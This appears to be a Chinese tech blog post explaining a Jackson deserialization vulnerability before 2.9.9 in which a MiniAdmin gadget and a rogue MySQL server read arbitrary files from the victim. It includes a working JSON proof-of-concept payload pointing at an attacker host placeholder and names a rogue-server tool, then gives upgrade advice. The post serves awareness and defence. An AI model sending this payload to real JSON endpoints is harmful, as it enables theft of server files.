上周升级完Fastjson之后,去了解了下Jackson是否也有相关的漏洞。
果不其然,看到了一个issue
虽然这个issue是好几个月前的了,但是可能大家对Jackson比较不在意,以为国外的开源要牛逼一点,不会像Fastjson那么多问题,这里要纠正一点,fastjson之所以问题多,那是因为你接触的多,Jackson的问题其实也不少,只是你接触的少。
就拿这种issue的问题来说,这个漏洞也很严重,攻击者可以通过构造特殊的字符串,然后在特定条件下可以悄无声息的窃取你服务器上的文件数据。
可怕不?但是恐怕知道的人不多,很多服务还是依赖着低版本的Jackson,也没升级。
解释下到底是什么漏洞,这么危险!
使用了Jackson 2.9.9之前的Java应用,如果服务依赖了mysql-connector-java,那么这个服务所在机器上的文件,就可能被任意读取走。
下面是具体原理分析。
先看下Json序列化对多态性的处理方式
public static class Person {
public String name;
public int age;
public Pet pet;
}
public static abstract class Pet {
public String name;
}
public static class Dog extends Pet {
public int age;
}
public static class Cat extends Pet {
}
ObjectMapper om = new ObjectMapper();
Person p = new Person();
p.name = "小黑";
p.age = 28;
Dog pet = new Dog();
pet.name = "小强";
pet.age = 2;
p.pet = pet;
System.out.println(om.writeValueAsString(p));
序列化之后
{"name":"小黑","age":28,"pet":{"name":"小强","age":2}}
序列化后类型消失,反序列化时因为Pet是抽象类,不知道该创建哪一个子类的对象。
但是Jackson提供了Default Typing,在开启的时候,可以序列化出更具体的类型。
ObjectMapper om = new ObjectMapper();
om.enableDefaultTyping();
得到的结果:
{"name":"小黑","age":28,"pet":["***.Dog",{"name":"小强","age":2}]}
所以,Jackson在开启Default Typing特性之后,就可以初始化一个具体的实例。
这个讲完之后,我们看下漏洞的最终元凶,MySQL的一个特殊用法:支持使用LOAD DATA LOCAL INFILE这样的语法,只要客户端连上某个MySQL服务,就可以把客户端本地文件的数据插入到这个MySQL的某个表中。
大概过程是这样的:
- 用户在客户端输入:load data local infile "/data.csv" into table test;
- 客户端=>服务端:我想把我本地的/data.csv文件插入到test表中;
- 服务端=>客户端:把你本地的/data.csv发给我;
- 客户端=>服务端:/data.csv文件的内容;
这里有一个问题,客户端发送哪个文件的内容,取决于第3步,如果服务端是个恶意的MySQL服务,那么他可以读取客户端的任意文件,比如读取/etc/passwd:
- 用户在客户端输入:load data local infile "/data.csv" into table test;
- 客户端=>服务端:我想把我本地的/data.csv文件插入到test表中;
- 服务端=>客户端:把你本地的/etc/passwd发给我;
- 客户端=>服务端:/etc/passwd文件的内容;
然后密码文件的内容就这样被嫖了。
引用MySQL官方文档如下:
In theory, a patched server could be built that would tell the client program to transfer a file of the server's choosing rather than the file named by the client in the LOAD DATA statement.
理论上,可以构建一个伪装服务器,它将告诉客户端传送一个服务指定的而不是通过客户端LOAD DATA语句指定的文件,意味着,我要什么,你就得给我什么,所以所有文件都可能泄露。
具体如何让服务中的MySQL客户端可以听我指挥,连到我预谋已久的MySQL服务呢?
首先,在MySQL的JDBC驱动中有一个创建连接的配置allowLoadLocalInfile,控制是否可以从本地读取文件,默认是可以的。
另外,不知道从哪个版本开始,MySQL的JDBC驱动多了一个类com.mysql.cj.jdbc.admin.MiniAdmin,可能没什么人用过,平时也用不到,但是它的牛逼之处在于可以创建一个到执行URL的JDBC连接。
public class MiniAdmin {
private JdbcConnection conn;
public MiniAdmin(String jdbcUrl) throws SQLException {
this(jdbcUrl, new Properties());
}
public MiniAdmin(String jdbcUrl, Properties props) throws SQLException {
this.conn = (JdbcConnection) (new Driver().connect(jdbcUrl, props));
}
...
}
想想,如果这个URL是我的那个伪装的MySQL服务,是不是就可以控制这个客户端轻松练上来,然后做一些不为人知的事情了。
事实上,确实可以。通过Jackson的反序列化特殊字符串,可以触发MiniAdmin的初始化,然后就在构造方法里创建一个到指定我MySQL服务的JDBC连接。
我们动手创建一个恶意的MySQL服务,可以使用https://github.com/Gifts/Rogue-MySql-Server,这个服务会读取客户端文件,并写入到mysql.log中。
启动服务,假设服务地址为:X.X.X.X.
ObjectMapper om = new ObjectMapper();
om.enableDefaultTyping();
String poc = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://X.X.X.X:3306/db\"]";
Object obj = om.readValue(poc, Object.class);
在客户端中执行如上代码,端口号和文件号在Rogue-MySql-Server中写死了,执行完之后,机器上的c:\windows\win.ini文件内容就会出现在mysql.log中。
在实际的生产环境中,可以通过往一些接受JSON参数的接口发送恶意的JSON数据来达成攻击的目的。
MySQL方面,从8.0.15开始将allowLoadLocalInfile默认值设置为false。
Jackson方面,从2.9.9版本开始,将com.mysql.cj.jdbc.admin.MiniAdmin加入反序列化黑名单:
怎么保护自己的系统
1、反序列化的坑,很大!需要尽量避免使用Object对象作为Jackson反序列化的目标。
2、序列化工具,该升级的要升级,不能拖!
